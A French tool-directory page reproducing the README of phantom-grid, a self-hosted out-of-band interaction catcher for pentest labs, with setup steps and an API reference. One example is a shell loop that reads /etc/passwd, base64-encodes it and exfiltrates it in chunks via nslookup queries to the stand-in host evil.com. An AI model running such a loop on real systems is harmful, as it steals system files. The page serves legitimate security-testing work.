Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

FluxContactConfidentialité© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
phantom-grid — Alternative gratuite à Burp Collaborator - capture d'interactions OOB (HTTP/HTTPS/DNS) avec SQLite et réassemblage d'exfiltration | Kitploit
Outils/GitHubGitHub/evkir/phantom-grid
Génération de PayloadsAnalyse des VulnérabilitésExploitation d'Applications WebExfiltration de DonnéesCollecte d'InformationsSécurité WebTests d'IntrusionUtilitaires et FrameworksRed TeamingAnalyse DNS
GitHub
112il y a 1 moisPas encore vérifié
evkir/phantom-grid

phantom-grid

Alternative gratuite à Burp Collaborator - capture d'interactions OOB (HTTP/HTTPS/DNS) avec SQLite et réassemblage d'exfiltration

Voir le dépôtSite web

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Phantom Grid

⬡ Phantom Grid

Alternative gratuite et open-source à Burp Collaborator pour les laboratoires de tests d'intrusion
Capture d'interactions Out-of-Band (OOB) · HTTP/HTTPS · DNS · SQLite · Réassemblage d'exfiltration


Qu'est-ce que c'est ?

Phantom Grid est un outil auto-hébergé de capture d'interactions OOB (Out-of-Band) — une alternative gratuite à Burp Collaborator pour résoudre des laboratoires de tests d'intrusion (PortSwigger Web Security Academy, HackTheBox, TryHackMe, etc.).

Fonctionnalités v2.0

FonctionnalitéDescription
Capture HTTP + HTTPSDouble pile avec certificats TLS auto-signés générés automatiquement
Capture DNSServeur DNS intégré sur le port 53
Réassemblage d'exfiltration DNSRéassemblage automatique des fragments à partir d'une exfiltration DNS multi-parties
Persistance SQLiteToutes les données survivent aux redémarrages du serveur (mode WAL pour la performance)
40+ modèles de payloadsSSRF, XXE, SQLi OOB, CMDi, SSTI, exfiltration DNS — prêts à copier
Tableau de bord tactiqueInterface de centre de commandement avec surveillance en temps réel
Prêt pour DockerDéploiement en une commande
API RESTAPI complète de gestion des tokens/interactions/exfiltrations

Démarrage rapide

Option 1 : Python

git clone https://github.com/YOUR_USERNAME/phantom-grid.git
cd phantom-grid
pip install -r server/requirements.txt

# HTTP only
python server/server.py

# HTTP + HTTPS (auto-generates self-signed cert)
python server/server.py --https

# Full stack (requires sudo for DNS port 53)
sudo python server/server.py --https --dns

Option 2 : Docker

git clone https://github.com/YOUR_USERNAME/phantom-grid.git
cd phantom-grid
docker compose up -d

Option 3 : ngrok (pour les laboratoires sans VPS)

python server/server.py --https &
ngrok http 9090
# Use the ngrok HTTPS URL in your payloads

Architecture

┌──────────────────────────────────────────────────────────────┐
│                      PHANTOM GRID v2.0                        │
│                                                               │
│  ┌─────────────┐      ┌─────────────────────────────────┐   │
│  │  Dashboard   │─API─▶│  Flask Server                   │   │
│  │  (React)     │      │                                 │   │
│  └─────────────┘      │  :9090  HTTP  capture + API     │   │
│                         │  :9443  HTTPS capture + API     │   │
│  ┌─────────────┐      │  :53    DNS   capture            │   │
│  │ Target App   │─────▶│                                 │   │
│  └─────────────┘      └──────────┬──────────────────────┘   │
│                                    │                          │
│                         ┌──────────▼──────────┐              │
│                         │   SQLite Database    │              │
│                         │   phantom_grid.db    │              │
│                         │                      │              │
│                         │  tokens              │              │
│                         │  interactions         │              │
│                         │  dns_exfil_sessions  │              │
│                         │  dns_exfil_chunks    │              │
│                         └─────────────────────┘              │
│                                                               │
└──────────────────────────────────────────────────────────────┘

Prise en charge HTTPS

Les applications modernes bloquent souvent les requêtes à contenu mixte (http:// depuis des pages https://). Phantom Grid v2.0 exécute HTTPS en parallèle de HTTP.

Certificat auto-signé généré automatiquement

python server/server.py --https
# Generates certs/server.pem + certs/server.key automatically
# HTTPS available at https://0.0.0.0:9443

Certificat personnalisé (Let's Encrypt, etc.)

python server/server.py --https \
  --cert /etc/letsencrypt/live/yourdomain/fullchain.pem \
  --key /etc/letsencrypt/live/yourdomain/privkey.pem

Avec ngrok (HTTPS public instantané)

python server/server.py &
ngrok http 9090
# ngrok provides a trusted HTTPS URL automatically

Réassemblage d'exfiltration DNS

Phantom Grid réassemble automatiquement les données d'exfiltration DNS fragmentées. C'est essentiel pour extraire de grandes charges utiles qui doivent être réparties sur plusieurs requêtes DNS (labels limités à 63 octets).

Formats pris en charge

FormatExempleCas d'usage
Simpledata.TOKEN.domainExfiltration d'une valeur unique
Indexé0.chunk1.TOKEN.domainSession automatique, fragments ordonnés
Étiquetésess1.0.chunk1.TOKEN.domainSession nommée avec ordonnancement
Signal de finend.sess1.TOKEN.domainMarquer la session comme terminée

Exemple : Exfiltrer /etc/passwd via DNS

Sur la cible :

# Split file into 50-byte base64 chunks and send via DNS
data=$(base64 /etc/passwd | tr -d '\n')
token="a1b2c3d4e5f6"
domain="evil.com"
i=0
while [ -n "$data" ]; do
  chunk=$(echo "$data" | cut -c1-50)
  data=$(echo "$data" | cut -c51-)
  nslookup "exfil.$i.$chunk.$token.$domain" >/dev/null 2>&1
  i=$((i+1))
done
nslookup "end.exfil.$token.$domain" >/dev/null 2>&1

Afficher les données réassemblées :

curl http://localhost:9090/api/tokens/a1b2c3d4e5f6/exfil

Réponse :

[{
  "session_tag": "exfil",
  "completed": 1,
  "chunk_count": 12,
  "reassembled": "cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYm..."
}]

Persistance SQLite

Toutes les données sont stockées dans phantom_grid.db en utilisant le mode WAL de SQLite pour des performances de lecture/écriture concurrentes.

phantom_grid.db
├── tokens                 — Token metadata
├── interactions            — All HTTP/DNS captures
├── dns_exfil_sessions     — Grouped exfil sessions
└── dns_exfil_chunks       — Individual exfil data chunks

Les données survivent aux redémarrages du serveur. Sauvegardez en copiant phantom_grid.db.


Référence de l'API

Tokens

MéthodeEndpointDescription
GET/api/tokensLister tous les tokens avec statistiques
POST/api/tokensCréer un token {"label": "...", "notes": "..."}
PATCH/api/tokens/<id>Mettre à jour le label/notes du token
DELETE/api/tokens/<id>Supprimer le token + toutes les données (CASCADE)

Interactions

MéthodeEndpointDescription
GET/api/tokens/<id>/interactions?limit=&offset=Obtenir les interactions d'un token
DELETE/api/tokens/<id>/interactionsEffacer les interactions
GET/api/log?limit=Journal global (tous les tokens)
GET/api/poll?since=<ISO>Interroger les nouvelles interactions

Exfiltration DNS

MéthodeEndpointDescription
GET/api/tokens/<id>/exfilObtenir les sessions d'exfiltration avec les données réassemblées

Système

Télécharger l’outil